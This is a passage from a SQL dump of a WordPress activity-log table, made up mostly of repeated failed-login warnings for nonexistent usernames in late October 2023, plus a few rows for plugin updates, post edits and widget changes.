11:59:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(38391,'2023-10-17 12:01:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40755,'2023-11-01 01:19:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40754,'2023-11-01 01:03:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40753,'2023-11-01 00:47:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40752,'2023-11-01 00:27:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40751,'2023-11-01 00:10:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40750,'2023-10-31 23:38:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40749,'2023-10-31 23:23:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40748,'2023-10-31 23:07:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40747,'2023-10-31 22:52:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40746,'2023-10-31 22:23:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40745,'2023-10-31 22:08:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40744,'2023-10-31 21:54:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40743,'2023-10-31 21:39:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40742,'2023-10-31 21:25:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40741,'2023-10-31 20:43:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40740,'2023-10-31 20:27:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40739,'2023-10-31 19:59:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40738,'2023-10-31 19:57:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40737,'2023-10-31 19:46:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40736,'2023-10-31 19:32:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40735,'2023-10-31 19:19:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40734,'2023-10-31 16:14:31','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to version {plugin_version} from {plugin_prev_version}','088412f0ef6bd25f8b7b169f3f3a13be','wp'),(40733,'2023-10-31 16:14:28','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','e63bcae7254395030b4cffaf26e35aec','wp'),(40731,'2023-10-31 15:29:30','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','a8d2bd831eff5abab2168930d7641876','other'),(40732,'2023-10-31 15:35:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40730,'2023-10-31 14:40:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40729,'2023-10-31 14:02:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40728,'2023-10-31 13:36:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40727,'2023-10-31 13:24:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40726,'2023-10-31 12:47:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40724,'2023-10-31 12:07:00','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','2d8ab40454a4123a6ba02e61074a2667','wp'),(40725,'2023-10-31 12:09:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40723,'2023-10-31 11:32:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40722,'2023-10-31 10:54:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40721,'2023-10-31 10:17:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40720,'2023-10-31 09:51:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40719,'2023-10-31 09:39:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40718,'2023-10-31 09:37:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40717,'2023-10-31 09:24:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40716,'2023-10-31 09:11:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40715,'2023-10-31 09:02:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40714,'2023-10-31 08:57:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40713,'2023-10-31 08:44:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40712,'2023-10-31 08:30:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40711,'2023-10-31 08:25:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40710,'2023-10-31 08:17:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40709,'2023-10-31 08:03:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40707,'2023-10-31 07:48:28','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','9b050370c8546eaace06f016af9d2662','wp'),(40708,'2023-10-31 07:50:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40706,'2023-10-31 07:48:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40705,'2023-10-31 07:37:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40704,'2023-10-31 07:23:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40703,'2023-10-31 07:11:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40702,'2023-10-31 07:10:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40701,'2023-10-31 06:57:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40700,'2023-10-31 06:43:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40699,'2023-10-31 06:35:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40698,'2023-10-31 06:30:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40697,'2023-10-31 06:16:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40696,'2023-10-31 06:03:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40695,'2023-10-31 05:58:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40694,'2023-10-31 05:49:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40693,'2023-10-31 05:36:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40692,'2023-10-31 05:23:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40691,'2023-10-31 05:22:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40690,'2023-10-31 05:10:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40689,'2023-10-31 04:56:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40688,'2023-10-31 04:45:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40687,'2023-10-31 04:43:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40686,'2023-10-31 04:30:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40685,'2023-10-31 04:17:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40684,'2023-10-31 04:09:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40683,'2023-10-31 04:03:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40682,'2023-10-31 03:50:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40681,'2023-10-31 03:37:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40680,'2023-10-31 03:33:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40679,'2023-10-31 03:24:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40678,'2023-10-31 03:10:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40677,'2023-10-31 02:57:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40676,'2023-10-31 02:57:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40675,'2023-10-31 02:43:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40674,'2023-10-31 02:30:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40673,'2023-10-31 02:20:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40672,'2023-10-31 02:16:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40671,'2023-10-31 02:03:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40670,'2023-10-31 01:50:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40669,'2023-10-31 01:44:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40668,'2023-10-31 01:37:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40667,'2023-10-31 01:23:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40666,'2023-10-31 01:10:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40665,'2023-10-31 01:07:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40664,'2023-10-31 00:56:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40663,'2023-10-31 00:43:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40662,'2023-10-31 00:32:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40661,'2023-10-31 00:30:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40660,'2023-10-31 00:22:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40659,'2023-10-31 00:19:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40658,'2023-10-31 00:16:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40657,'2023-10-31 00:07:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40656,'2023-10-31 00:03:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40655,'2023-10-30 23:55:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40654,'2023-10-30 23:51:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40653,'2023-10-30 23:50:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40652,'2023-10-30 23:37:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40651,'2023-10-30 23:36:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40650,'2023-10-30 23:23:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40649,'2023-10-30 23:21:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40648,'2023-10-30 23:20:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40647,'2023-10-30 23:10:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40646,'2023-10-30 23:06:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40645,'2023-10-30 22:57:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40644,'2023-10-30 22:50:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40643,'2023-10-30 22:49:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40642,'2023-10-30 22:45:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40641,'2023-10-30 22:44:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40640,'2023-10-30 22:36:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40639,'2023-10-30 22:31:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40638,'2023-10-30 22:21:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40637,'2023-10-30 22:18:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40636,'2023-10-30 22:12:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40635,'2023-10-30 22:05:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40634,'2023-10-30 22:04:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40633,'2023-10-30 21:51:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40632,'2023-10-30 21:50:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40631,'2023-10-30 21:39:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40630,'2023-10-30 21:38:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40629,'2023-10-30 21:34:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40628,'2023-10-30 21:25:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40627,'2023-10-30 21:19:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40626,'2023-10-30 21:12:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40625,'2023-10-30 21:05:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40515,'2023-10-29 17:49:40','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','eaa9dc1999e67406a4247f0d0387cb92','other'),(40516,'2023-10-29 18:16:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40517,'2023-10-29 19:28:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40518,'2023-10-29 21:18:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40519,'2023-10-29 22:03:06','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','633fc4fb6c07ecf633e9cdf00b8fd119','other'),(40520,'2023-10-29 23:42:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40521,'2023-10-30 00:40:25','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','f518805f9f29393a46045cec058e27c3','other'),(40522,'2023-10-30 01:42:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40523,'2023-10-30 02:42:28','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40524,'2023-10-30 03:00:05','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','5f7227918ce8a5ecf440357cc1b59b34','wp_user'),(40525,'2023-10-30 03:00:07','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','dbcfcaf68ec6dd477d5cb18a292e4d83','wp_user'),(40526,'2023-10-30 03:00:18','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','08d3800f786f67cc7567f321e1ee8714','wp_user'),(40527,'2023-10-30 03:01:50','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','deaa3cc7c9766748f992da0b6fa4726e','wp_user'),(40528,'2023-10-30 03:01:50','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','f7c7145c6ce5133853475cbca8c6bfcd','wp_user'),(40529,'2023-10-30 03:01:51','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','4494d23f9eae9ba8cffeb244bb48a154','wp_user'),(40530,'2023-10-30 03:02:01','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','e364735a6a15f2690b9fb6e00409c118','wp_user'),(40531,'2023-10-30 03:02:32','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','1b8159f0fa19d0fa8eecf461b9ba48a5','wp_user'),(40532,'2023-10-30 03:02:45','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','1c1e1ec9b5617b3633553eaeb8f2d4c0','wp_user'),(40533,'2023-10-30 03:03:26','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','1e1ac3474dec4c359c000b8b93ed6b31','wp_user'),(40534,'2023-10-30 03:03:46','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','5586695ea43267e6539df71a6f0de17c','wp_user'),(40535,'2023-10-30 03:03:56','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','43d2c5b2814059e52046dd299ab9c5ce','wp_user'),(40536,'2023-10-30 03:04:18','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','3845471760636f522ae383e95373fc6f','wp_user'),(40537,'2023-10-30 03:04:22','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','0492aaf440c04fcc6bd5a52deb68d3e0','wp_user'),(40538,'2023-10-30 03:04:26','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','b6fba9af07190e64c2d25820cc5b84fe','wp_user'),(40539,'2023-10-30 03:04:41','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','12a2cfd6405d2990da26958abac4f1a9','wp_user'),(40540,'2023-10-30 03:05:00','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','ebbb97cc118ed41290243cb47e186ea6','wp_user'),(40541,'2023-10-30 03:06:33','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','6aa17f297d4382392ff15e01439afc4d','wp_user'),(40542,'2023-10-30 03:06:55','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','fe58d7789557ea1414b18d5dd6f9d8f9','wp_user'),(40543,'2023-10-30 03:08:06','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','a9bbff74c286cfeec9a5033e0b7196f2','wp_user'),(40544,'2023-10-30 03:08:20','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','2195b3394a1b5aed35a5546b677e60b2','wp_user'),(40545,'2023-10-30 03:08:24','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','3345a1969bf49a8a6912bf37b1be8044','wp_user'),(40546,'2023-10-30 03:08:36','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','829d11f674685aeb6da1def600eef834','wp_user'),(40547,'2023-10-30 03:08:38','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','9bbab588d74970ac9c66e6efae8b2e17','wp_user'),(40548,'2023-10-30 03:08:46','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','1ea4464dcfe0074cdab079cce9188db4','wp_user'),(40549,'2023-10-30 03:09:05','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','34d9074f4f0605ddd443c1a886213bdf','wp_user'),(40550,'2023-10-30 03:09:24','SimpleThemeLogger','info','Changed widget \"{widget_id_base}\" in sidebar \"{sidebar_id}\"','602a9af8a6239e402f75274e51470375','wp_user'),(40551,'2023-10-30 03:11:06','SimpleThemeLogger','info','Customized theme appearance \"{setting_id}\"','c74519e7aed8ef50fca41a8aa9e070a4','wp_user'),(40552,'2023-10-30 03:13:18','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40553,'2023-10-30 03:54:09','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','19f539c76f7306f71ab2ec048cd73d9c','other'),(40554,'2023-10-30 05:21:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40555,'2023-10-30 08:44:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40556,'2023-10-30 08:44:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40557,'2023-10-30 08:44:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40558,'2023-10-30 12:12:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does 